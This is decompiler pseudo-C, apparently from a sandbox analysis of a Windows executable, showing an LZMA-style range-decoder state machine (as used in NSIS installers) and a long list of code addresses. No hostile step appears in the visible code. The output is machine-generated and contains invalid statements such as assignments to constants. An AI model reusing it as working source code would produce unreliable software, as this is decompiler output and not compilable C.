							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040604c
0x0040604c
0x00406051
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x00406053
0x00406053
0x00406057
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406078
0x0040607f
0x00406082
0x0040608d
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x0040609c
0x004060ba
0x004060bc
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062e1
0x004062e4
0x00406287
0x0040628d
0x00000000
0x00000000
0x00000000
0x004062e6
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406284
0x00000000
0x00406284
0x0040609e
0x0040609e
0x004060a1
0x004060a7
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406190
0x00406193
0x0040610a
0x0040610a
0x00406110
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x0040621d
0x00406220
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061c0
0x004061c0
0x00406220
0x00406227
0x00406227
0x00406227
0x0040622b
0x0040622b
0x0040622e
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040611c
0x00000000
0x00000000
0x00000000
0x00406199
0x004060e5
0x004060e9
0x00406856
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406107
0x00000000
0x00406107
0x00406193
0x0040609c
0x00405ed0
0x00405ed0
0x00405ed9
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
